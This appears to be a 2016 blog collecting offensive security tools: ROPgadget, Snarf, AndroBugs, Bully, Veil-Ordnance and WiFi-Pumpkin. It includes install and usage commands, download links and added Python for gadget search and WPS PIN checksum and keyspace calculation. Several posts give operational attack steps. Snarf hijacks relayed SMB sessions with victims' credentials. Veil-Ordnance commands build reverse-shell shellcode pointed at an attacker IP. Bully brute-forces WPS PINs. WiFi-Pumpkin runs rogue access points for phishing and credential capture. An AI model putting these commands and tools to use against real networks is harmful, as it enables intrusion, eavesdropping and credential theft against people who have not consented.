Saturday, 30 January 2016

ROPgadget Tool

This tool lets you search for gadgets in your binaries to facilitate ROP exploitation. ROPgadget supports the ELF/PE/Mach-O formats on the x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures. Since version 5, ROPgadget has a new core written in Python that uses the Capstone disassembly framework for the gadget search engine; the older version can be found in the Archives directory, but it is no longer maintained.

How to install 

If you want to use ROPgadget, you have to install Capstone first.
To install Capstone on a *nix machine:
$ sudo pip install capstone
Capstone supports multiple platforms (Windows, iOS, Android, Cygwin...). For cross-compilation, please refer to the https://github.com/aquynh/capstone/blob/master/COMPILE.TXT file.
After Capstone is installed, ROPgadget can be used as a standalone tool:
$ ROPgadget.py
Or installed into the Python site-packages library, and executed from $PATH.
$ python setup.py install
$ ROPgadget
Or installed from PyPI:
$ pip install ropgadget
$ ROPgadget

Usage

usage: ROPgadget.py [-h] [-v] [-c] [--binary <binary>] [--opcode <opcodes>]
                    [--string <string>] [--memstr <string>] [--depth <nbyte>]
                    [--only <key>] [--filter <key>] [--range <start-end>]
                    [--badbytes <byte>] [--rawArch <arch>] [--rawMode <mode>]
                    [--offset <hexaddr>] [--ropchain] [--thumb] [--console]
                    [--norop] [--nojop] [--nosys]

optional arguments:
  -h, --help           show this help message and exit
  -v, --version        Display the ROPgadget's version
  -c, --checkUpdate    Checks if a new version is available
  --binary <binary>    Specify a binary filename to analyze
  --opcode <opcodes>   Searh opcode in executable segment
  --string <string>    Search string in readable segment
  --memstr <string>    Search each byte in all readable segment
  --depth <nbyte>      Depth for search engine (default 10)
  --only <key>         Only show specific instructions
  --filter <key>       Suppress specific instructions
  --range <start-end>  Search between two addresses (0x...-0x...)
  --badbytes <byte>    Rejects specific bytes in the gadget's address
  --rawArch <arch>     Specify an arch for a raw file
  --rawMode <mode>     Specify a mode for a raw file
  --offset <hexaddr>   Specify an offset for gadget addresses
  --ropchain           Enable the ROP chain generation
  --thumb              Use the thumb mode for the search engine (ARM only)
  --console            Use an interactive console for search engine
  --norop              Disable ROP search engine
  --nojop              Disable JOP search engine
  --nosys              Disable SYS search engine
  --multibr            Enable multiple branch gadgets
  --all                Disables the removal of duplicate gadgets
  --dump               Outputs the gadget bytes
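
The search engine described above, as an added example that is not ROPgadget's own code: a toy Python gadget finder run over a constructed byte string. It assumes a deliberately tiny x86-64 decoder (push/pop r64 with an optional REX.B prefix, nop, ret and ret imm16, nothing else) and a simplified bad-byte rule that looks at the significant bytes of the address, so it is an illustration of the algorithm rather than a replacement for the Capstone-based engine. It shows what --depth, --badbytes and --offset do, and the default rule that drops sequences with a branch in the middle (which --multibr relaxes).

```python
# Added example, not ROPgadget's own code: a toy version of the gadget search
# engine. Only a handful of x86-64 opcodes are decoded (assumption: enough to
# show the algorithm), and the bad-byte rule is simplified.

REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
REGS_EXT = ["r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]


def decode_one(code, i):
    """Decode one instruction at offset i.

    Returns (text, length), or None when the byte is not one of the few
    opcodes this toy decoder knows (push/pop r64, nop, ret, ret imm16).
    """
    b = code[i]
    if b == 0xC3:
        return ("ret", 1)
    if b == 0xC2 and i + 2 < len(code):          # ret imm16
        imm = code[i + 1] | (code[i + 2] << 8)
        return (f"ret 0x{imm:x}", 3)
    if b == 0x90:
        return ("nop", 1)
    if 0x50 <= b <= 0x57:
        return (f"push {REGS[b - 0x50]}", 1)
    if 0x58 <= b <= 0x5F:
        return (f"pop {REGS[b - 0x58]}", 1)
    if b == 0x41 and i + 1 < len(code):           # REX.B prefix -> r8..r15
        nb = code[i + 1]
        if 0x50 <= nb <= 0x57:
            return (f"push {REGS_EXT[nb - 0x50]}", 2)
        if 0x58 <= nb <= 0x5F:
            return (f"pop {REGS_EXT[nb - 0x58]}", 2)
    return None


def has_bad_byte(addr, badbytes):
    """True if any significant byte of addr is in badbytes (simplified rule,
    an assumption of this example; the real tool matches the hex form)."""
    width = max(1, (addr.bit_length() + 7) // 8)
    return any(b in badbytes for b in addr.to_bytes(width, "big"))


def find_gadgets(code, base=0, depth=10, badbytes=(), multibr=False):
    """Return [(address, 'insn ; insn ; ret'), ...] sorted by address.

    For every ret, try each start offset up to `depth` bytes before it and
    keep the sequence only if decoding from that start lands exactly on that
    ret. `base` plays the role of --offset, `badbytes` of --badbytes.
    """
    seen, found = set(), []
    for end in range(len(code)):
        ret = decode_one(code, end)
        if ret is None or not ret[0].startswith("ret"):
            continue
        ret_end = end + ret[1]
        for start in range(max(0, end - depth), end + 1):
            seq, i, last_start = [], start, None
            while i < ret_end:
                ins = decode_one(code, i)
                if ins is None:
                    break
                seq.append(ins[0])
                last_start, i = i, i + ins[1]
            if i != ret_end or last_start != end:
                continue                          # did not decode onto this ret
            if not multibr and any(t.startswith("ret") for t in seq[:-1]):
                continue                          # branch in the middle
            text = " ; ".join(seq)
            addr = base + start
            if text in seen or has_bad_byte(addr, badbytes):
                continue                          # duplicate or bad address
            seen.add(text)
            found.append((addr, text))
    return sorted(found)


# Constructed byte string for the demo (not taken from any real binary).
SAMPLE = bytes([
    0x90,                    # 0: nop
    0x5F, 0x5E, 0xC3,        # 1: pop rdi ; pop rsi ; ret
    0x41, 0x5C, 0xC3,        # 4: pop r12 ; ret   (0x5C alone decodes as pop rsp)
    0xFF,                    # 7: byte the toy decoder does not understand
    0x58, 0xC2, 0x08, 0x00,  # 8: pop rax ; ret 0x8
])

if __name__ == "__main__":
    for addr, text in find_gadgets(SAMPLE, base=0x401000, badbytes=(0x00,)):
        print(f"0x{addr:016x} : {text}")
```

Run as-is, the gadget at 0x401000 (nop ; pop rdi ; pop rsi ; ret) is dropped because its address contains a 0x00 byte, while pop rsp ; ret shows up at 0x401005 even though no compiler emitted it: it comes from decoding into the middle of the REX-prefixed pop r12, which is exactly why byte-level gadget search finds more than a linear disassembly does.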

How can I contribute?

  • Use Z3 to solve the ROP chain
  • Add system gadgets for PPC, Sparc, ARM64 (Gadgets.addSYSGadgets())
  • Manage big endian in Mach-O format like the ELF class.
  • Everything you think is cool :)

Screenshots

(Images not reproduced here: x64, ARM, Sparc, MIPS, PowerPC, ROP chain.)

Download tool : https://goo.gl/T0Ar38

Thursday, 28 January 2016

Snarf man-in-the-middle

Snarf is a software suite that helps increase the value of man-in-the-middle attacks. Many historical applications of techniques like SMB-Relay rely on assumptions, and relegate these attacks to the exploitation phase rather than the discovery/enumeration phase of a penetration test. While Snarf doesn't introduce new vulnerabilities, it does introduce a new capability to capitalize on exploiting familiar vulnerabilities.

The Fundamental Idea

At its core, Snarf has one key principle in play: when you MITM something, don't throw it away. Don't just try to lob a payload through it and hope it works. Instead, we relay a connection for a client, and keep the connection to the server when the client is done. We hold onto it, and provide a facility to jack in additional tools to that same, preserved connection. This way, once we middle a connection, we can explore it. Use multiple tools, assess what privileges or rights we have, etc. -- all to give the penetration tester more direct control of the situation.

Prerequisites

You will need several key things. First, Snarf relies on iptables, so it is Linux-specific. It may be possible to move it to something like PF, but that is currently unknown. At any rate, here is a list of basic requirements:
  • Linux (Kali works fine)
  • NodeJS -- Snarf is implemented in Node to take advantage of its snazzy event-driven I/O
  • An existing MITM / redirection strategy -- Snarf will not MITM the victim, it will only capitalize on it
    • ARP poisoning
    • DHCP poisoning
    • LLMNR poisoning
    • ICMP redirect
    • GRE tunnels
    • etc.
In most Linux distributions, the only thing you'll have to do is install Node. In a Debian-derived distribution, this would look something like this (works in Kali):
$ sudo apt-get install nodejs

Running Snarf

Here's the basic process:
  1. Do a man-in-the-middle -- Linux must be routing the traffic of your victim
  2. Run Snarf as root, binding to your LAN IP
    $ sudo node snarf.js
  3. Run the iptables rule to move traffic to SNARF's chain:
    $ sudo iptables -t nat -A PREROUTING -p tcp --dport 445 -j SNARF
  4. Open a web browser to http://localhost:4001/
  5. Wait for a connection to come through
  6. Either wait for the connection to "complete" or "expire" it manually with the provided buttons
  7. Connect your own tools (e.g., for SMB use smbclient, net, Metasploit, etc.) to 127.0.0.1. (Note, the username and password you use don't matter -- Snarf will authenticate it no matter what. The resulting session will use the snarfed connection to the server and, with it, the victim's credentials)

Known Issues

  1. For SMB, Snarf only does username/password auth, not anonymous sessions. You will want to provide a "-U user%pass" to any Samba-derived tools to make sure this will work.
  2. Snarf makes minimal changes to your traffic. So, when you do a TREE_CONNECT, it will pass the destination hostname unchanged. If you make it "localhost", then the server will give you an error about a duplicate name. This is because servers don't like being called "localhost". Instead, connect to "127.0.0.1" -- Windows doesn't mind this. In other words, run "smbclient -U b%b //127.0.0.1/c$", and don't use the name "localhost" in the command.
  3. Windows does weird and unpredictable things. Sometimes, you may end up with a session that doesn't work. This could be a bug (so feel free to let us know about it), but it could also just be a vagary of SMB. Servers don't always keep sessions around as reliably as we want, etc. So, while Snarf will dramatically improve your ability to get value out of a middled connection, remember that there is still a probabilistic aspect to any MITM attack.
  4. Make sure you follow the on-screen instructions for completing the iptables setup -- we don't apply the last iptables rule in the code because MITM is inherently dangerous. Think carefully about how that rule should be used. You probably don't want hundreds of systems coming through, so you can adjust the parameters on the "iptables -t nat -I PREROUTING -p tcp --dport 445 -j SNARF" command to ensure that only the desired systems get snarfed. 

Download tool : https://goo.gl/zukxDk

Android vulnerability scanner

AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. It has no splendid GUI, but it is fast (less than 2 minutes per scan on average) and accurate.
Version: 1.0.0

Features:

  • Find security vulnerabilities in an Android app
  • Check if the code is missing best practices
  • Check dangerous shell commands (e.g. “su”)
  • Collect Information from millions of apps
  • Check the app’s security protection (marked as <Hacker>, designed for app repackaging hacking)

Author

  • Yu-Cheng Lin (androbugs.framework at gmail.com, @AndroBugs)

Setup Steps and Usage for Windows

Easy to use for Android developers or hackers on Microsoft Windows: (a) no need to install Python 2.7; (b) no need to install any 3rd-party library; (c) no need to install AndroBugs Framework.
  1. mkdir C:\AndroBugs_Framework
  2. cd C:\AndroBugs_Framework
  3. Unzip the latest Windows version of AndroBugs Framework from Windows releases
  4. Go to Computer->System Properties->Advanced->Environment Variables. Add "C:\AndroBugs_Framework" to the "Path" variable
  5. androbugs.exe -h
  6. androbugs.exe -f [APK file]

Massive Analysis Tool Setup Steps and Usage for Windows

  1. Complete the Setup Steps and Usage for Windows first
  2. Install the Windows version of MongoDB (https://www.mongodb.org/downloads)
  3. Install PyMongo library
  4. Config your own MongoDB settings: C:\AndroBugs_Framework\androbugs-db.cfg
  5. Choose your preferred MongoDB management tool (http://mongodb-tools.com/)
  6. AndroBugs_MassiveAnalysis.exe -h
    • Example: AndroBugs_MassiveAnalysis.exe -b 20151112 -t BlackHat -d .\All_Your_Apps\ -o .\Massive_Analysis_Reports
  7. AndroBugs_ReportByVectorKey.exe -h
    • Example: AndroBugs_ReportByVectorKey.exe -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat

Usage for Unix/Linux

To run the AndroBugs Framework:

python androbugs.py -f [APK file]

To check the usage:

python androbugs.py -h

Usage of Massive Analysis Tools for Unix/Linux

Prerequisite: Setup MongoDB and config your own MongoDB settings in "androbugs-db.cfg"

To run the massive analysis for AndroBugs Framework:

python AndroBugs_MassiveAnalysis.py -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input directory] -o [Report output directory]
Example:
python AndroBugs_MassiveAnalysis.py -b 20151112 -t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports

To get the summary report and all the vectors of massive analysis:

python AndroBugs_ReportSummary.py -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag]
Example:
python AndroBugs_ReportSummary.py -m massive -b 20151112 -t BlackHat

To list the potentially vulnerable apps by Vector ID and Severity Level (Log Level):

python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag]
python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -a
Example:
python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat
python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat -a

Requirements

  • Python 2.7.x (DO NOT USE Python 3.X)
  • PyMongo library (If you want to use the massive analysis tool)


Download tool : https://goo.gl/9Dc3Ea

Tuesday, 26 January 2016

WPS brute force attack tool

Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and CPU performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc.) regardless of architecture.
Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.
You must already have Wiire's Pixiewps installed. The latest version can be found here: https://github.com/wiire/pixiewps


Requirements

apt-get -y install build-essential libpcap-dev libssl-dev aircrack-ng pixiewps

Setup

Download
git clone https://github.com/aanarchyy/bully
or
wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
Build
cd bully*/
cd src/
make
Install
sudo make install

Usage

  usage: bully <options> interface

  Required arguments:

      interface      : Wireless interface in monitor mode (root required)

      -b, --bssid macaddr    : MAC address of the target access point
   Or
      -e, --essid string     : Extended SSID for the access point

  Optional arguments:

      -c, --channel N[,N...] : Channel number of AP, or list to hop [b/g]
      -i, --index N          : Starting pin index (7 or 8 digits)  [Auto]
      -l, --lockwait N       : Seconds to wait if the AP locks WPS   [43]
      -o, --outfile file     : Output file for messages          [stdout]
      -p, --pin N            : Starting pin number (7 or 8 digits) [Auto]
      -s, --source macaddr   : Source (hardware) MAC address      [Probe]
      -v, --verbosity N      : Verbosity level 1-4, 1 is quietest     [3]
      -w, --workdir path     : Location of pin/session files  [~/.bully/]
      -5, --5ghz             : Hop on 5GHz a/n default channel list  [No]
      -B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]
      -F, --force            : Force continue in spite of warnings   [No]
      -S, --sequential       : Sequential pins (do not randomize)    [No]
      -T, --test             : Test mode (do not inject any packets) [No]

  Advanced arguments:

      -d, --pixiewps         : Attempt to use pixiewps               [No]
      -a, --acktime N        : Deprecated/ignored                  [Auto]
      -r, --retries N        : Resend packets N times when not acked  [2]
      -m, --m13time N        : Deprecated/ignored                  [Auto]
      -t, --timeout N        : Deprecated/ignored                  [Auto]
      -1, --pin1delay M,N    : Delay M seconds every Nth nack at M5 [0,1]
      -2, --pin2delay M,N    : Delay M seconds every Nth nack at M7 [5,1]
      -A, --noacks           : Disable ACK check for sent packets    [No]
      -C, --nocheck          : Skip CRC/FCS validation (performance) [No]
      -D, --detectlock       : Detect WPS lockouts unreported by AP  [No]
      -E, --eapfail          : EAP Failure terminate every exchange  [No]
      -L, --lockignore       : Ignore WPS locks reported by the AP   [No]
      -M, --m57nack          : M5/M7 timeouts treated as WSC_NACK's  [No]
      -N, --nofcs            : Packets don't contain the FCS field [Auto]
      -P, --probe            : Use probe request for nonbeaconing AP [No]
      -R, --radiotap         : Assume radiotap headers are present [Auto]
      -W, --windows7         : Masquerade as a Windows 7 registrar   [No]
      -Z, --suppress         : Suppress packet throttling algorithm  [No]
      -V, --version          : Print version info and exit
      -h, --help             : Display this help information
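
To make the "well known design flaw" in the description concrete, here is an added Python example (not Bully's own code) that computes the WPS PIN checksum digit the -B option otherwise guesses, validates a PIN, and counts how many candidates the protocol's split-half verification leaves, which is why -i/-p speak of "7 or 8 digits". It assumes the checksum rule from the WPS specification (a weighted digit sum modulo 10) and the 4 + 3 (+ checksum) split; the PIN values in it are constructed for illustration.

```python
# Added example, not part of Bully: the WPS PIN checksum digit and the size of
# the candidate set left by verifying the two halves of the PIN separately.
# Assumption: the checksum rule as given in the WPS specification.

def wps_checksum_digit(first7):
    """Return the 8th (checksum) digit for the first 7 digits of a WPS PIN.

    Odd-position digits are weighted 3, even-position digits weighted 1, and
    the checksum digit brings the total to a multiple of 10.
    """
    digits = [int(c) for c in f"{first7:07d}"]
    acc = 3 * sum(digits[0::2]) + sum(digits[1::2])
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin):
    """True when an 8-digit PIN (int or str) carries the right checksum digit."""
    s = str(pin).zfill(8)
    if len(s) != 8 or not s.isdigit():
        return False
    return int(s[7]) == wps_checksum_digit(int(s[:7]))


def wps_pin_keyspace(bruteforce_checksum=False):
    """Worst-case number of PIN candidates the registrar protocol exposes.

    The access point NACKs each half of the PIN separately (the NACKs that
    Bully's -1/-2 delay options throttle), so the halves add instead of
    multiply: 10^4 for the first four digits, then 10^3 for the next three
    when the checksum digit is derived, or 10^4 when it is guessed as well
    (Bully's -B).
    """
    first_half = 10 ** 4
    second_half = 10 ** 4 if bruteforce_checksum else 10 ** 3
    return first_half + second_half


if __name__ == "__main__":
    for p in ("12345670", "12345671", "00000000"):   # constructed PINs
        print(p, "valid" if is_valid_wps_pin(p) else "bad checksum")
    print("candidates:", wps_pin_keyspace(), "or",
          wps_pin_keyspace(True), "with -B")
```

The two numbers, 11,000 and 20,000 instead of the 10^8 an eight-digit PIN suggests, are the reason defenders disable the external-registrar PIN method on access points or depend on the lockout behaviour that the -l/--lockwait and -D/--detectlock options react to.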

-d // --pixiewps

The -d option performs an offline attack, Pixie Dust (pixiewps), by automatically passing the PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey; pixiewps will then try to attack Ralink, Broadcom and Realtek chipsets.

-v // --verbosity

The -v option specifies the verbosity of bully. -v 4 now prints all the collected hashes and outputs the pixiewps command run. The default level is 3.

Download tool : https://goo.gl/1vhpKC

Friday, 22 January 2016

Veil-Ordnance Tool

Veil-Ordnance is designed to quickly generate shellcode that can be used for exploits or payloads. The inspiration for this came after multiple discussions between @christruncer, @themightyshiv, and @harmj0y where we identified a need for a tool that generates shellcode, that won't change its output on us. Rather than rely on a third party to do this, we decided we should write our own.
All payloads in this tool were ported from the Metasploit Framework. There is no claim to being the original author of any of the payloads. The awesome guys working on the Metasploit Project deserve all praise for writing the different payloads within this tool. Their payloads were simply ported from Ruby to Python.  


Usage:
./Veil-Ordnance.py -p rev_tcp --ip 192.168.63.149 --port 8675
Examples:
./Veil-Ordnance.py -p rev_https --ip 192.168.63.149 --port 443 -e xor -b \x00\x0a --print-stats
Thanks: Thanks to the Metasploit team for all their hard work. Allowing their code to be used by the community is awesome, and really appreciated. Thanks to Jon Yates (@redbeardsec) for really helping to get me up to speed and providing his analysis on how payloads are generated. Thanks to Justin Warner (@sixdub) for allowing me to include his shellcode encoder within Ordnance.
Call to Action: We'd love for an additional encoder, or more, to be added to Veil-Ordnance. The more that can be added in/ported, the better the coverage in ensuring that at least one encoder can be used to avoid any specific bad character. If anyone is willing to port one, or send us a Python version of their encoder, please hit us up, or send a pull request! We'd be happy to give you full credit.

Download tool : https://goo.gl/6zXIxU

Wednesday, 20 January 2016

Wi-Fi Access Point Attack

Framework for Rogue Wi-Fi Access Point Attack

Description

WiFi-Pumpkin is a security tool that sets up a rogue access point for man-in-the-middle and other network attacks. The access point purports to provide wireless Internet service while snooping on the traffic; it can be used to capture the credentials of unsuspecting users, either by snooping on their communication or by phishing.

Installation

Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5
 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
 cd WiFi-Pumpkin
 chmod +x installer.sh
 ./installer.sh --install
Refer to the wiki for installation details.

Features

  • Rogue Wi-Fi Access Point
  • Deauth Attack Clients AP
  • Probe Request Monitor
  • DHCP Starvation Attack
  • Credentials Monitor
  • Windows Update Attack
  • Phishing Manager
  • Partial bypass HSTS
  • Dump credentials phishing
  • Support beef hook
  • Report Logs html
  • Mac Changer
  • ARP Poison
  • DNS Spoof

Plugins

Screenshots

(Images not reproduced here. Links on the original page: Tool Home, Tool demo.)

Download tool : https://goo.gl/K39qMG